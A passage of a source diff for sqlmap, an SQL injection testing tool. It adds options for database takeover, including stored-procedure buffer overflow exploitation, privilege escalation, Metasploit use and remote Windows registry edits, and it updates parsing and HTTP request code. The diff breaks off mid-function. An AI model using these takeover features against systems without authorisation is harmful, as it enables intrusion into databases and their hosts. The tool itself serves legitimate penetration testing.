+                            help="Stored procedure buffer overflow "
+                                 "exploitation")
+
+        takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
+                            help="Database process' user privilege escalation")
+
+        takeover.add_option("--msf-path", dest="msfPath",
+                            help="Local path where Metasploit Framework 3 "
+                                 "is installed")
+
+        takeover.add_option("--tmp-path", dest="tmpPath",
+                            help="Remote absolute path of temporary files "
+                                 "directory")
+
+        # Windows registry options
+        windows = OptionGroup(parser, "Windows registry access", "These "
+                               "options can be used to access the back-end "
+                               "database management system Windows "
+                               "registry.")
+
+        windows.add_option("--reg-read", dest="regRead", action="store_true",
+                            help="Read a Windows registry key value")
+
+        windows.add_option("--reg-add", dest="regAdd", action="store_true",
+                            help="Write a Windows registry key value data")
+
+        windows.add_option("--reg-del", dest="regDel", action="store_true",
+                            help="Delete a Windows registry key value")
+
+        windows.add_option("--reg-key", dest="regKey",
+                            help="Windows registry key")
+
+        windows.add_option("--reg-value", dest="regVal",
+                            help="Windows registry key value")
+
+        windows.add_option("--reg-data", dest="regData",
+                            help="Windows registry key value data")
+
+        windows.add_option("--reg-type", dest="regType",
+                            help="Windows registry key value type")

        # Miscellaneous options
        miscellaneous = OptionGroup(parser, "Miscellaneous")

-        miscellaneous.add_option("--union-test", dest="unionTest",
-                                 action="store_true",
-                                 help="Test for UNION SELECT (inband) SQL injection")
-
-        miscellaneous.add_option("--union-use", dest="unionUse",
-                                 action="store_true",
-                                 help="Use the UNION SELECT (inband) SQL injection "
-                                      "to retrieve the queries output. No "
-                                      "need to go blind")
-
-        miscellaneous.add_option("--eta", dest="eta", action="store_true",
-                                 help="Retrieve each query output length and "
-                                      "calculate the estimated time of arrival "
-                                      "in real time")
-
-        miscellaneous.add_option("-v", dest="verbose", type="int",
-                                 help="Verbosity level: 0-5 (default 0)")
-
-        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
-                                help="Update sqlmap to the latest stable version")
-
        miscellaneous.add_option("-s", dest="sessionFile",
                                 help="Save and resume all data retrieved "
                                      "on a session file")
                                      
-        miscellaneous.add_option("-c", dest="configFile",
-                                 help="Load options from a configuration INI file")
+        miscellaneous.add_option("--flush-session", dest="flushSession", action="store_true",
+                                 help="Flush session file for current target")
+                                      
+        miscellaneous.add_option("--eta", dest="eta", action="store_true",
+                                 help="Display for each output the "
+                                      "estimated time of arrival")
+
+        miscellaneous.add_option("--gpage", dest="googlePage", type="int",
+                                 help="Use google dork results from specified page number")
+
+        miscellaneous.add_option("--update", dest="updateAll", action="store_true",
+                                  help="Update sqlmap")

        miscellaneous.add_option("--save", dest="saveCmdline", action="store_true",
                                 help="Save options on a configuration INI file")
@@ -245,18 +415,26 @@ def cmdLineParser():
        miscellaneous.add_option("--batch", dest="batch", action="store_true",
                                 help="Never ask for user input, use the default behaviour")

+        miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
+                                 help="Clean up the DBMS by sqlmap specific "
+                                      "UDF and tables")
+
+        parser.add_option_group(target)
        parser.add_option_group(request)
        parser.add_option_group(injection)
+        parser.add_option_group(techniques)
        parser.add_option_group(fingerprint)
        parser.add_option_group(enumeration)
+        parser.add_option_group(udf)
        parser.add_option_group(filesystem)
        parser.add_option_group(takeover)
+        parser.add_option_group(windows)
        parser.add_option_group(miscellaneous)

        (args, _) = parser.parse_args()

-        if not args.url and not args.googleDork and not args.configFile and not args.updateAll:
-            errMsg  = "missing a mandatory parameter ('-u', '-g', '-c' or '--update'), "
+        if not args.url and not args.list and not args.googleDork and not args.configFile and not args.requestFile and not args.updateAll:
+            errMsg  = "missing a mandatory parameter ('-u', '-l', '-r', '-g', '-c' or '--update'), "
            errMsg += "-h for help"
            parser.error(errMsg)

--- a/lib/parse/configfile.py
+++ b/lib/parse/configfile.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from ConfigParser import NoSectionError
 from ConfigParser import ConfigParser

@@ -33,10 +31,8 @@ from lib.core.data import logger
 from lib.core.exception import sqlmapMissingMandatoryOptionException
 from lib.core.optiondict import optDict

-
 config = None

-
 def configFileProxy(section, option, boolean=False, integer=False):
    """
    Parse configuration file and save settings into the configuration
@@ -63,7 +59,6 @@ def configFileProxy(section, option, boolean=False, integer=False):
        debugMsg += "ignoring. Skipping to next."
        logger.debug(debugMsg)

-
 def configFileParser(configFile):
    """
    Parse configuration file and save settings into the configuration
@@ -79,15 +74,18 @@ def configFileParser(configFile):
    config = ConfigParser()
    config.read(configFile)

-    if not config.has_section("Request"):
-        raise NoSectionError, "Request in the configuration file is mandatory"
+    if not config.has_section("Target"):
+        raise NoSectionError, "Target in the configuration file is mandatory"

-    if not config.has_option("Request", "url") and not config.has_option("Request", "googleDork"):
+    condition  = not config.has_option("Target", "url")
+    condition &= not config.has_option("Target", "list")
+    condition &= not config.has_option("Target", "googleDork")
+
+    if condition:
        errMsg  = "missing a mandatory option in the configuration "
-        errMsg += "file (url or googleDork)"
+        errMsg += "file (url, list or googleDork)"
        raise sqlmapMissingMandatoryOptionException, errMsg

-
    for family, optionData in optDict.items():
        for option, data in optionData.items():
            boolean = False
--- a/lib/parse/handler.py
+++ b/lib/parse/handler.py
@@ -0,0 +1,87 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import re
+from xml.sax.handler import ContentHandler
+from lib.core.common import sanitizeStr
+
+class FingerprintHandler(ContentHandler):
+    """
+    This class defines methods to parse and extract information from
+    the given DBMS banner based upon the data in XML file
+    """
+
+    def __init__(self, banner, info):
+        self.__banner      = sanitizeStr(banner)
+        self.__regexp      = None
+        self.__match       = None
+        self.__dbmsVersion = None
+        self.__techVersion = None
+        self.__info        = info
+
+    def __feedInfo(self, key, value):
+        value = sanitizeStr(value)
+
+        if value in ( None, "None" ):
+            return
+
+        if key in ( "dbmsVersion" ):
+            self.__info[key] = value
+        else:
+            if key not in self.__info.keys():
+                self.__info[key] = set()
+
+            for v in value.split("|"):
+                self.__info[key].add(v)
+
+    def startElement(self, name, attrs):
+        if name == "regexp":
+            self.__regexp = sanitizeStr(attrs.get("value"))
+            self.__match  = re.search(self.__regexp, self.__banner, re.I | re.M)
+
+        if name == "info" and self.__match:
+            self.__feedInfo("type", attrs.get("type"))
+            self.__feedInfo("distrib", attrs.get("distrib"))
+            self.__feedInfo("release", attrs.get("release"))
+            self.__feedInfo("codename", attrs.get("codename"))
+
+            self.__dbmsVersion = sanitizeStr(attrs.get("dbms_version"))
+            self.__techVersion = sanitizeStr(attrs.get("tech_version"))
+            self.__sp          = sanitizeStr(attrs.get("sp"))
+
+            if self.__dbmsVersion.isdigit():
+                self.__feedInfo("dbmsVersion", self.__match.group(int(self.__dbmsVersion)))
+
+            if self.__techVersion.isdigit():
+                self.__feedInfo("technology", "%s %s" % (attrs.get("technology"), self.__match.group(int(self.__techVersion))))
+            else:
+                self.__feedInfo("technology", attrs.get("technology"))
+
+            if self.__sp.isdigit():
+                self.__feedInfo("sp", "Service Pack %s" % self.__match.group(int(self.__sp)))
+
+            self.__regexp      = None
+            self.__match       = None
+            self.__dbmsVersion = None
+            self.__techVersion = None
--- a/lib/parse/headers.py
+++ b/lib/parse/headers.py
@@ -0,0 +1,67 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import os
+
+from xml.sax import parse
+
+from lib.core.common import checkFile
+from lib.core.data import kb
+from lib.core.data import paths
+from lib.parse.handler import FingerprintHandler
+
+def headersParser(headers):
+    """
+    This function calls a class that parses the input HTTP headers to
+    fingerprint the back-end database management system operating system
+    and the web application technology
+    """
+
+    # It is enough to parse the headers on first four HTTP responses
+    if kb.headersCount > 3:
+        return
+
+    kb.headersCount += 1
+
+    topHeaders = {
+                   "cookie":                          os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
+                   "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
+                   "server":                          os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
+                   "servlet-engine":                  os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
+                   "set-cookie":                      os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
+                   "x-aspnet-version":                os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
+                   "x-powered-by":                    os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml")
+                 }
+
+    for header in headers:
+        if header in topHeaders.keys():
+            value   = headers[header]
+            xmlfile = topHeaders[header]
+
+            checkFile(xmlfile)
+
+            handler = FingerprintHandler(value, kb.headersFp)
+
+            parse(xmlfile, handler)
+            parse(paths.GENERIC_XML, handler)
--- a/lib/parse/html.py
+++ b/lib/parse/html.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 import re

 from xml.sax import parse
@@ -31,7 +29,8 @@ from xml.sax.handler import ContentHandler

 from lib.core.common import checkFile
 from lib.core.common import sanitizeStr
-
+from lib.core.data import kb
+from lib.core.data import paths

 class htmlHandler(ContentHandler):
    """
@@ -47,7 +46,6 @@ class htmlHandler(ContentHandler):

        self.dbms     = None

-
    def startElement(self, name, attrs):
        if name == "dbms":
            self.__dbms = attrs.get("value")
@@ -60,16 +58,19 @@ class htmlHandler(ContentHandler):
                self.dbms = self.__dbms
                self.__match = None

-
-def htmlParser(page, xmlfile):
+def htmlParser(page):
    """
    This function calls a class that parses the input HTML page to
    fingerprint the back-end database management system
    """

+    xmlfile = paths.ERRORS_XML
    checkFile(xmlfile)
    page = sanitizeStr(page)
    handler = htmlHandler(page)
    parse(xmlfile, handler)

+    if handler.dbms and handler.dbms not in kb.htmlFp:
+        kb.htmlFp.append(handler.dbms)
+
    return handler.dbms
--- a/lib/parse/queriesfile.py
+++ b/lib/parse/queriesfile.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,8 +22,6 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
 from xml.sax import parse
 from xml.sax.handler import ContentHandler

@@ -34,7 +32,6 @@ from lib.core.data import queries
 from lib.core.data import paths
 from lib.core.datatype import advancedDict

-
 class queriesHandler(ContentHandler):
    """
    This class defines methods to parse the default DBMS queries
@@ -45,7 +42,6 @@ class queriesHandler(ContentHandler):
        self.__dbms    = ''
        self.__queries = advancedDict()

-
    def startElement(self, name, attrs):
        if name == "dbms":
            data = sanitizeStr(attrs.get("value"))
@@ -95,10 +91,25 @@ class queriesHandler(ContentHandler):
            data = sanitizeStr(attrs.get("query"))
            self.__queries.count = data

+        elif name == "comment":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.comment = data
+
+        elif name == "timedelay":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.timedelay = data
+
+            data = sanitizeStr(attrs.get("query2"))
+            self.__queries.timedelay2 = data
+
        elif name == "substring":
            data = sanitizeStr(attrs.get("query"))
            self.__queries.substring = data

+        elif name == "case":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.case = data
+
        elif name == "inference":
            data = sanitizeStr(attrs.get("query"))
            self.__queries.inference = data
@@ -115,18 +126,27 @@ class queriesHandler(ContentHandler):
            data = sanitizeStr(attrs.get("query"))
            self.__queries.currentDb = data

+        elif name == "is_dba":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.isDba = data
+
+        elif name == "check_udf":
+            data = sanitizeStr(attrs.get("query"))
+            self.__queries.checkUdf = data
+
        elif name == "inband":
            self.__inband    = sanitizeStr(attrs.get("query"))
            self.__inband2   = sanitizeStr(attrs.get("query2"))
-            self.__condition = sanitizeStr(attrs.get("condition"))
-            self.__condition2 = sanitizeStr(attrs.get("condition2"))
+            self.__conditionInband = sanitizeStr(attrs.get("condition"))
+            self.__conditionInband2 = sanitizeStr(attrs.get("condition2"))

        elif name == "blind":
            self.__blind  = sanitizeStr(attrs.get("query"))
            self.__blind2 = sanitizeStr(attrs.get("query2"))
            self.__count  = sanitizeStr(attrs.get("count"))
            self.__count2 = sanitizeStr(attrs.get("count2"))
-
+            self.__conditionBlind = sanitizeStr(attrs.get("condition"))
+            self.__conditionBlind2 = sanitizeStr(attrs.get("condition2"))

    def endElement(self, name):
        if name == "dbms":
@@ -143,7 +163,7 @@ class queriesHandler(ContentHandler):

        elif name == "passwords":
            self.__passwords = {}
-            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition }
+            self.__passwords["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband }
            self.__passwords["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                           "count": self.__count, "count2": self.__count2 }

@@ -151,7 +171,7 @@ class queriesHandler(ContentHandler):

        elif name == "privileges":
            self.__privileges = {}
-            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__condition, "condition2": self.__condition2 }
+            self.__privileges["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
            self.__privileges["blind"]  = { "query": self.__blind, "query2": self.__blind2,
                                           "count": self.__count, "count2": self.__count2 }

@@ -167,18 +187,25 @@ class queriesHandler(ContentHandler):

        elif name == "tables":
            self.__tables = {}
-            self.__tables["inband"] = { "query": self.__inband, "condition": self.__condition }
+            self.__tables["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
            self.__tables["blind"]  = { "query": self.__blind, "count": self.__count }

            self.__queries.tables = self.__tables

        elif name == "columns":
            self.__columns = {}
-            self.__columns["inband"] = { "query": self.__inband }
-            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count }
+            self.__columns["inband"] = { "query": self.__inband, "condition": self.__conditionInband }
+            self.__columns["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "condition": self.__conditionBlind }

            self.__queries.columns = self.__columns

+        elif name == "dump_column":
+            self.__dumpColumn = {}
+            self.__dumpColumn["inband"] = { "query": self.__inband, "query2": self.__inband2, "condition": self.__conditionInband, "condition2": self.__conditionInband2 }
+            self.__dumpColumn["blind"]  = { "query": self.__blind, "query2": self.__blind2, "count": self.__count, "count2": self.__count2, "condition": self.__conditionBlind, "condition2": self.__conditionBlind2 }
+
+            self.__queries.dumpColumn = self.__dumpColumn
+
        elif name == "dump_table":
            self.__dumpTable = {}
            self.__dumpTable["inband"] = { "query": self.__inband }
@@ -186,7 +213,6 @@ class queriesHandler(ContentHandler):

            self.__queries.dumpTable = self.__dumpTable

-
 def queriesParser():
    """
    This function calls a class to parse the default DBMS queries
--- a/lib/request/init.py
+++ b/lib/request/init.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
--- a/lib/request/basic.py
+++ b/lib/request/basic.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,16 +22,21 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
+import gzip
+import os
 import re
+import StringIO
+import zlib

+from lib.core.common import directoryPath
+from lib.core.common import isWindowsPath
+from lib.core.common import posixToNtSlashes
+from lib.core.common import urlEncodeCookieValues
 from lib.core.data import conf
 from lib.core.data import kb
-from lib.core.data import paths
+from lib.parse.headers import headersParser
 from lib.parse.html import htmlParser

-
 def forgeHeaders(cookie, ua):
    """
    Prepare HTTP Cookie and HTTP User-Agent headers to use when performing
@@ -42,6 +47,9 @@ def forgeHeaders(cookie, ua):

    for header, value in conf.httpHeaders:
        if cookie and header == "Cookie":
+            if conf.cookieUrlencode:
+                cookie = urlEncodeCookieValues(cookie)
+
            headers[header] = cookie
        elif ua and header == "User-Agent":
            headers[header] = ua
@@ -50,32 +58,49 @@ def forgeHeaders(cookie, ua):

    return headers

-
-def parsePage(page):
+def parseResponse(page, headers):
    """
    @param page: the page to parse to feed the knowledge base htmlFp
    (back-end DBMS fingerprint based upon DBMS error messages return
    through the web application) list and absFilePaths (absolute file
    paths) set.
-
-    @todo: in the future parse the page content scrolling an XML file to
-    identify the dynamic language used and, most, the absolute path,
-    like for DBMS error messages (ERRORS_XML), see above.
    """

-    if not page:
-        return
+    if headers:
+        headersParser(headers)

-    htmlParsed = htmlParser(page, paths.ERRORS_XML)
-
-    if htmlParsed and htmlParsed not in kb.htmlFp:
-        kb.htmlFp.append(htmlParsed)
+    if page:
+        htmlParser(page)

        # Detect injectable page absolute system path
        # NOTE: this regular expression works if the remote web application
        # is written in PHP and debug/error messages are enabled.
-    absFilePaths = re.findall(" in <b>(.*?)</b> on line", page, re.I)
+        absFilePathsRegExp = ( r" in <b>(?P<result>.*?)</b> on line",  r"(?:>|\s)(?P<result>[A-Za-z]:[\\/][\w.\\/]*)", r"(?:>|\s)(?P<result>/\w[/\w.]+)" )

-    for absFilePath in absFilePaths:
+        for absFilePathRegExp in absFilePathsRegExp:
+            reobj = re.compile(absFilePathRegExp)
+
+            for match in reobj.finditer(page):
+                absFilePath = match.group("result").strip()
+                page = page.replace(absFilePath, "")
+                if isWindowsPath(absFilePath):
+                    absFilePath = posixToNtSlashes(absFilePath)
                if absFilePath not in kb.absFilePaths:
                    kb.absFilePaths.add(absFilePath)
+                    
+
+def decodePage(page, encoding):
+    """
+    Decode gzip/deflate HTTP response
+    """
+
+    if str(encoding).lower() in ('gzip', 'x-gzip', 'deflate'):
+        if encoding == 'deflate':
+            # http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations
+            data = StringIO.StringIO(zlib.decompress(page, -15))
+        else:
+            data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(page))
+
+        page = data.read()
+
+    return page
--- a/lib/request/certhandler.py
+++ b/lib/request/certhandler.py
@@ -0,0 +1,45 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import sys
+import httplib
+import urllib2
+
+from lib.core.data import conf
+
+class HTTPSCertAuthHandler(urllib2.HTTPSHandler):
+    def __init__(self, key_file, cert_file):
+        urllib2.HTTPSHandler.__init__(self)
+        self.key_file = key_file
+        self.cert_file = cert_file
+
+    def https_open(self, req):
+        return self.do_open(self.getConnection, req)
+
+    def getConnection(self, host):
+        if sys.version_info >= (2,6):
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file, timeout=conf.timeout)
+        else:
+            retVal = httplib.HTTPSConnection(host, key_file=self.key_file, cert_file=self.cert_file)
+        return retVal
--- a/lib/request/comparison.py
+++ b/lib/request/comparison.py
@@ -0,0 +1,108 @@
+#!/usr/bin/env python
+
+"""
+$Id$
+
+This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
+
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>
+
+sqlmap is free software; you can redistribute it and/or modify it under
+the terms of the GNU General Public License as published by the Free
+Software Foundation version 2 of the License.
+
+sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
+WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
+details.
+
+You should have received a copy of the GNU General Public License along
+with sqlmap; if not, write to the Free Software Foundation, Inc., 51
+Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+"""
+
+import re
+
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.session import setMatchRatio
+
+def comparison(page, headers=None, getSeqMatcher=False):
+    regExpResults = None
+
+    # String to be excluded before calculating page hash
+    if conf.eString and conf.eString in page:
+        index              = page.index(conf.eString)
+        length             = len(conf.eString)
+        pageWithoutString  = page[:index]
+        pageWithoutString += page[index+length:]
+        page               = pageWithoutString
+
+    # Regular expression matches to be excluded before calculating page hash
+    if conf.eRegexp:
+        regExpResults = re.findall(conf.eRegexp, page, re.I | re.M)
+
+        if regExpResults:
+            for regExpResult in regExpResults:
+                index              = page.index(regExpResult)
+                length             = len(regExpResult)
+                pageWithoutRegExp  = page[:index]
+                pageWithoutRegExp += page[index+length:]
+                page               = pageWithoutRegExp
+
+    # String to match in page when the query is valid
+    if conf.string:
+        if conf.string in page:
+            return True
+        else:
+            return False
+
+    # Regular expression to match in page when the query is valid
+    if conf.regexp:
+        if re.search(conf.regexp, page, re.I | re.M):
+            return True
+        else:
+            return False
+
+    if conf.seqLock:
+        conf.seqLock.acquire()
+
+    conf.seqMatcher.set_seq2(page)
+    ratio = round(conf.seqMatcher.ratio(), 3)
+
+    if conf.seqLock:
+        conf.seqLock.release()
+
+    # If the url is stable and we did not set yet the match ratio and the
+    # current injected value changes the url page content
+    if conf.matchRatio is None:
+        if conf.md5hash is not None and ratio > 0.6 and ratio < 1:
+            logger.debug("setting match ratio to %.3f" % ratio)
+            conf.matchRatio = ratio
+
+        elif conf.md5hash is None or ( conf.md5hash is not None and ratio < 0.6 ):
+            logger.debug("setting match ratio to default value 0.900")
+            conf.matchRatio = 0.900
+
+        if conf.matchRatio is not None:
+            setMatchRatio()
+
+    # If it has been requested to return the ratio and not a comparison
+    # response
+    if getSeqMatcher:
+        return ratio
+
+    # If the url is stable it returns True if the page has the same MD5
+    # hash of the original one
+    # NOTE: old implementation, it did not handle automatically the fact
+    # that the url could be not stable (due to VIEWSTATE, counter, etc.)
+    #elif conf.md5hash is not None:
+    #    return conf.md5hash == md5hash(page)
+
+    # If the url is not stable it returns sequence matcher between the
+    # first untouched HTTP response page content and this content
+    elif ratio > conf.matchRatio:
+        return True
+    else:
+        return False
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -5,8 +5,8 @@ $Id$

 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.

-Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
-                        and Daniele Bellucci <daniele.bellucci@gmail.com>
+Copyright (c) 2007-2010 Bernardo Damele A. G. <bernardo.damele@gmail.com>
+Copyright (c) 2006 Daniele Bellucci <daniele.bellucci@gmail.com>

 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -22,22 +22,25 @@ with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """

-
-
-import md5
+import httplib
 import re
+import socket
+import time
 import urllib2
 import urlparse
+import traceback

 from lib.contrib import multipartpost
 from lib.core.convert import urlencode
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
+from lib.core.common import sanitizeAsciiString
 from lib.core.exception import sqlmapConnectionException
+from lib.request.basic import decodePage
 from lib.request.basic import forgeHeaders
-from lib.request.basic import parsePage
-
+from lib.request.basic import parseResponse
+from lib.request.comparison import comparison


 class Connect:
@@ -45,6 +48,10 @@ class Connect:
    This class defines methods used to perform HTTP requests
    """

+    @staticmethod
+    def __getPageProxy(**kwargs):
+        return Connect.getPage(**kwargs)
+
    @staticmethod
    def getPage(**kwargs):
        """
@@ -52,6 +59,9 @@ class Connect:
        the target url page content
        """

+        if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0:
+            time.sleep(conf.delay)
+
        url       = kwargs.get('url',       conf.url).replace(" ", "%20")
        get       = kwargs.get('get',       None)
        post      = kwargs.get('post',      None)
@@ -59,29 +69,40 @@ class Connect:
        ua        = kwargs.get('ua',        None)
        direct    = kwargs.get('direct',    False)
        multipart = kwargs.get('multipart', False)
+        silent    = kwargs.get('silent',    False)
+        raise404  = kwargs.get('raise404',  True)

+        page            = ""
        cookieStr       = ""
        requestMsg      = "HTTP request:\n%s " % conf.method
+        requestMsg     += "%s" % urlparse.urlsplit(url)[2] or "/"
        responseMsg     = "HTTP response "
        requestHeaders  = ""
        responseHeaders = ""

-        if re.search("http[s]*://%s" % conf.hostname, url, re.I):
-            requestMsg += "%s" % conf.path or "/"
-        else:
-            requestMsg += "%s" % urlparse.urlsplit(url)[2] or "/"
+        try:
+            if silent:
+                socket.setdefaulttimeout(3)
    
            if direct:
                if "?" in url:
                    url, params = url.split("?")
-                params = urlencode(params).replace("%%", "%")
+                    params = urlencode(params)
                    url = "%s?%s" % (url, params)
                    requestMsg += "?%s" % params
    
            elif multipart:
-                multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
+                #needed in this form because of potential circle dependency problem (option -> update -> connect -> option)
+                from lib.core.option import proxyHandler
+                
+                multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler)
                conn = multipartOpener.open(url, multipart)
                page = conn.read()            
+                responseHeaders = conn.info()
+    
+                encoding = responseHeaders.get("Content-Encoding")
+                page = decodePage(page, encoding)
+    
                return page
    
            else:
@@ -89,7 +110,7 @@ class Connect:
                    get = conf.parameters["GET"]
    
                if get:
-                get = urlencode(get).replace("%%", "%")
+                    get = urlencode(get)
                    url = "%s?%s" % (url, get)
                    requestMsg += "?%s" % get
    
@@ -97,24 +118,22 @@ class Connect:
                    if conf.parameters.has_key("POST") and not post:
                        post = conf.parameters["POST"]
    
-                post = urlencode(post).replace("%%", "%")
-
            requestMsg += " HTTP/1.1"

-        if cookie:
-            cookie = urlencode(cookie).replace("%%", "%")
-
-        try:
